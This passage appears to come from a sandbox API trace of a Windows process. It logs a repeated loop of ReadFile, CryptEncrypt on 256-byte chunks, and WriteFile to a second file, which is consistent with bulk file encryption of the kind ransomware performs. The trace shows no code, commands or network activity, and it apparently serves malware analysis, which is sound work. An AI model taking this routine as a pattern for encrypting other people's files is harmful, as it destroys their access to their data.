pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.157] GetLastError () returned 0x0 [0170.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.157] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.157] GetLastError () returned 0x0 [0170.157] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.157] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.157] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.158] GetLastError () returned 0x0 [0170.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.158] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.158] GetLastError () returned 0x0 [0170.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.158] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.158] GetLastError () returned 0x0 [0170.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.158] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.158] GetLastError () returned 0x0 [0170.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.158] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.158] GetLastError () returned 0x0 [0170.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.159] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.159] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.159] GetLastError () returned 0x0 [0170.159] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.159] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.159] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.159] GetLastError () returned 0x0 [0170.159] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.159] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.159] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.159] GetLastError () returned 0x0 [0170.159] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.159] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.159] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.159] GetLastError () returned 0x0 [0170.159] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.159] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.159] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.159] GetLastError () returned 0x0 [0170.159] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.160] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.160] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.160] GetLastError () returned 0x0 [0170.160] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.160] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.160] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.160] GetLastError () returned 0x0 [0170.160] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.160] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.160] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.160] GetLastError () returned 0x0 [0170.160] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.160] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.160] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.160] GetLastError () returned 0x0 [0170.160] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.160] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.160] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.160] GetLastError () returned 0x0 [0170.160] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.160] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.161] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.161] GetLastError () returned 0x0 [0170.161] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.161] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.161] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.161] GetLastError () returned 0x0 [0170.161] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.161] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.161] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.161] GetLastError () returned 0x0 [0170.161] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.161] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.161] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.161] GetLastError () returned 0x0 [0170.161] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.161] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.161] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.161] GetLastError () returned 0x0 [0170.161] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.162] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.162] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.162] GetLastError () returned 0x0 [0170.162] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.162] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.162] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.162] GetLastError () returned 0x0 [0170.162] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.162] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.162] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.162] GetLastError () returned 0x0 [0170.162] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.162] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.162] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.162] GetLastError () returned 0x0 [0170.162] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.162] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.163] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.163] GetLastError () returned 0x0 [0170.163] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.163] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.163] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.163] GetLastError () returned 0x0 [0170.163] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.163] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.163] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.163] GetLastError () returned 0x0 [0170.163] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.163] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.163] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.163] GetLastError () returned 0x0 [0170.163] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.163] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.163] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.163] GetLastError () returned 0x0 [0170.164] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.164] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.164] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.164] GetLastError () returned 0x0 [0170.164] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.164] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.164] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 